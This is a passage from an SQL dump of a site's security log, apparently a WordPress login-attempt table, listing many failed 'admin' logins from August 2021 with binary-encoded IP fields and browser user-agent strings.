Firefox/62.0'),(4255,6674,1628834091.486497,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����A','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4256,6674,1628834091.574531,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����A','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4257,6675,1628834382.610881,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��A<\n�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4258,6677,1628835031.370011,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���Q֨','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4259,6677,1628835031.441921,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���Q֨','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4260,6680,1628836013.268260,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��go(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4261,6681,1628836340.415095,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��νUX','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4262,6682,1628836663.873192,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����$�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4263,6683,1628836991.859365,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��g���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4264,6684,1628837343.587216,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��٠�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4265,6684,1628837343.633730,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��٠�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4266,6685,1628837682.986365,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���.x�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4267,6686,1628837996.106410,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��3�e2','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4268,6688,1628838630.106258,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���\n�u','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4269,6688,1628838630.137189,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���\n�u','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4270,6689,1628838954.417195,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��zt�J','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4271,6689,1628838954.481052,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��zt�J','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4272,6690,1628839281.624058,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4273,6691,1628839603.056026,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��g|\\O','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4274,6692,1628839934.833259,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��#�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4275,6693,1628840275.102254,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���a��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4276,6694,1628840585.199770,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����kQ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4277,6695,1628840942.551364,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��3�T�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4278,6696,1628841266.037333,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��=C�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4279,6697,1628841601.463314,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��B��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4280,6698,1628841938.034089,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4281,6702,1628843235.703367,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����A','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4282,6704,1628843912.114618,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���-�B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4283,6705,1628844254.872250,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��gx�V','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4284,6706,1628844584.964550,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��Օg�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4285,6707,1628844894.044981,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����X�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4286,6708,1628845245.989037,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���!�9','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4287,6709,1628845885.819396,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��C͘','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4288,6713,1628847286.058633,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���q�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4289,6714,1628847592.583827,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��go(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4290,6715,1628847943.864349,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��t2~','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4291,6715,1628847943.899872,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��t2~','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4292,6718,1628848952.870306,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4293,6718,1628848952.981194,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4294,6720,1628849285.450924,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��g�t�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4295,6722,1628851832.754595,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����t\r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4296,6724,1628852642.763128,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��3KZ\'','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4297,6724,1628852642.814646,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��3KZ\'','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4298,6725,1628853044.631454,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��-@6�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4299,6729,1628854556.067796,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��e%�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4300,6732,1628856125.617626,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��pNH','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4301,6732,1628856125.789673,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��pNH','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4302,6733,1628856666.053380,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��o]5�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4303,6733,1628856666.121636,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��o]5�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4304,6734,1628857165.722000,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���;�.','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4305,6737,1628858289.593749,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4306,6738,1628858986.955162,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���\0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4307,6739,1628859167.794426,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����O','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4308,6742,1628860744.858108,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��\"@�f','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4309,6743,1628860914.598327,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��A<\n�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4310,6744,1628861635.856424,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��g8�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4311,6746,1628862540.564868,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��6%','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4312,6750,1628864355.005071,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��E1��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4313,6750,1628864355.123915,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��E1��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4314,6752,1628865167.811387,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4315,6752,1628865167.863369,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4316,6753,1628865760.447725,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��3�8�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4317,6753,1628865760.871556,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��3�8�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4318,6754,1628865789.830059,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���H�%','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'),(4319,6755,1628866134.528970,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��-w��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4320,6757,1628866856.408952,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���i','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4321,6758,1628867402.649530,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4322,6759,1628867946.181147,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���[h�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4323,6760,1628868165.947781,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����Ù','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(4324,6761,1628869369.132733,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���wң','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),(4325,6763,1628872978.084327,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��իо','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(4326,6766,1628876599.501347,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��\"]$d','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(4327,6768,1628879003.401758,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��νY�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),(4328,6768,1628879003.456395,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��νY�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),(4329,6769,1628879466.206446,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��gZ�(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4330,6770,1628879714.013403,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����9�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4331,6771,1628880036.986397,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����EY','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4332,6772,1628880363.690900,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��g8�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4333,6773,1628880689.804687,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��j5s}','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4334,6774,1628881029.029021,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4335,6775,1628881368.496697,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���[L=','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4336,6776,1628881433.065858,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��_կ�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(4337,6777,1628881694.177333,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4338,6778,1628881990.937088,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���3�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4339,6779,1628882322.741415,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4340,6780,1628882647.229095,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���6x]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4341,6781,1628882979.672247,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���p�\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4342,6784,1628883872.374879,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���옔','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36'),(4343,6786,1628884326.652895,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��#�R','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4344,6787,1628884638.302004,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���@v�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4345,6788,1628884967.036703,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���@t�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4346,6788,1628884967.087490,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���@t�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4347,6789,1628885113.234337,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��>��','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'),(4348,6789,1628885113.278821,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��>��','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'),(4349,6790,1628885639.341447,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��jK��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4350,6791,1628885996.130837,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��E1��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4351,6792,1628886317.743701,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��zt�J','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4352,6793,1628886320.312178,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��#�,&','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0'),(4353,6794,1628886673.475914,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���Vw�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4354,6795,1628887354.184288,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���;!�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4355,6796,1628887556.053601,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����\"�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36'),(4356,6797,1628887715.059838,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���q٤','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4357,6798,1628888065.329453,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��MD~�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4358,6799,1628888374.842665,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��g|\\O','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4359,6800,1628888716.136700,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4360,6801,1628888765.046002,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���B��','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'),(4361,6803,1628889445.486423,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����J','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4362,6805,1628889984.310378,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����o','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36'),(4363,6806,1628890141.540269,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���\r\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4364,6808,1628890835.342763,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��H\"\"�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4365,6811,1628891543.809482,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��1�m�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4366,6812,1628891906.994470,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4367,6813,1628892265.639425,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���_nq','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4368,6814,1628892433.844834,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���B��','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),(4369,6816,1628892976.401608,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����6�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4370,6817,1628893354.567161,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���kS�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4371,6821,1628894823.188830,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���Z�_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4372,6822,1628895161.829592,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����\"d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4373,6828,1628897355.133287,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���,X#','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(4374,6831,1628898225.081873,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4375,6835,1628899334.789224,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��j�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4376,6841,1628901437.742426,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��J�g�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4377,6843,1628902315.436785,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��QX4�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'),(4378,6844,1628902620.619118,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����A','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4379,6846,1628903395.392497,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��3Dp^','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4380,6847,1628903558.455379,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���>|�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 